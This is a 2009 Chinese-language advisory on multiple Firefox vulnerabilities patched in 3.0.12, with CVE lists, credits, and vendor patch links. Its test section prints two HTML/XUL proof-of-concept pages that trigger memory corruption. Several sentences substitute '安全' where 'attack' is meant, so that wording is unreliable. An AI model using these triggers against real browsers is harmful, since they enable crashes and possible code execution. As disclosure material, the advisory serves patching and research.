Firefox 3.0.12版本修复多个安全漏洞
来源:岁月联盟
时间:2009-07-28
Mozilla Firefox < 3.0.12
不受影响系统:
Mozilla Firefox 3.5
Mozilla Firefox 3.0.12
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 34870,35765,35766,35767,35769,35770,35772,35773,35774,35775,35776
CVE(CAN) ID: CVE-2009-1194,CVE-2009-2462,CVE-2009-2463,CVE-2009-2464,CVE-2009-2465,CVE-2009-2466,CVE-2009-2467,CVE-2009-2468,CVE-2009-2469,CVE-2009-2471,CVE-2009-2472
Firefox是Mozilla所发布的开源WEB浏览器。
Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制或安全用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。
1) 浏览器和Javascript引擎中的多个错误可能导致内存破坏并执行任意代码。
2) base64解码函数中的整数溢出可能触发内存破坏,导致执行任意代码。
3) 处理XUL树元素中多个RDF文件时的错误可能触发内存破坏,导致执行任意代码。
4) 创建文档时的错误可能导致两次拷贝这个文档中的某些元素。
5) 处理帧时的错误可能导致内存破坏和执行任意代码。
6) 在导航到其他页面时处理Flash对象中的错误可能触发对已删除对象的调用,导致执行任意代码。
7) 多个字体轮廓渲染库中的多个整数溢出和堆溢出漏洞可能允许恶意用户安全用户的系统。
8) 在处理watch函数和__defineSetter__函数对某些属性所设置的SVG元素时的错误可能导致内存破坏并执行任意代码。
9) 在使用某些对象参数调用setTimeout()时的错误可能导致对象失去其wrapper,安全者可以以chrome权限执行任意Javascript代码。
10) 处理对象wrapper时的多个错误可能导致访问其他站点对对象所设置的属性。
<*来源:moz_bug_r_a4 (moz_bug_r_a4@yahoo.com)
Will Drewry (wad@google.com)
Christophe Charron
Peter Van der Beken
链接:http://secunia.com/advisories/35914/
http://www.mozilla.org/security/announce/2009/mfsa2009-40.html
http://www.mozilla.org/security/announce/2009/mfsa2009-39.html
http://www.mozilla.org/security/announce/2009/mfsa2009-37.html
http://www.mozilla.org/security/announce/2009/mfsa2009-36.html
http://www.mozilla.org/security/announce/2009/mfsa2009-35.html
http://www.mozilla.org/security/announce/2009/mfsa2009-34.html
http://marc.info/?l=bugtraq&m=124172043024163&w=2
https://www.redhat.com/support/errata/RHSA-2009-1163.html
https://www.redhat.com/support/errata/RHSA-2009-1162.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>div::first-letter { color: green; }</style>
<script>
function boom()
{
var e = document.getElementById("e");
document.documentElement.style.direction = "rtl";
e.style.whiteSpace = "pre";
}
</script>
</head>
<body onload="boom();">
<div><span style="direction: rtl;" id="e"><span>
</span>A B</span></div>
</body></html></html>
<window xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<box>
<box id="1" observes="a"/>
</box>
<code xmlns="http://www.w3.org/1999/xhtml" id="g" observes="1"/>
<box id="a" observes="g"/>
<box style="display: table;" id="1"/>
<script xmlns="http://www.w3.org/1999/xhtml">
function doe_() {
window.addEventListener(’DOMAttrModified’, function(e) {document.getElementsByTagName(’code’)[0]; }, true);
document.getElementsByTagName(’box’)[1].addEventListener(’DOMAttrModified’, function(e) {e.target.parentNode.parentNode.removeChild(e.target.parentNode) }, true);
}
setTimeout(doe_, 50);
function doe() {
document.getElementById(’auto’).appendChild(document.getElementsByTagName(’box’)[0]);
document.getElementById(’auto’).appendChild(document.getElementsByTagName(’code’)[0]);
}
setTimeout(doe, 100);
</script>
<box id="auto"/>
</window>
https://bugzilla.mozilla.org/attachment.cgi?id=328514
建议:
--------------------------------------------------------------------------------
临时解决方法:
* 禁用JavaScript。
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.org/
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:1162-01)以及相应补丁:
RHSA-2009:1162-01:Critical: firefox security update
链接:https://www.redhat.com/support/errata/RHSA-2009-1162.html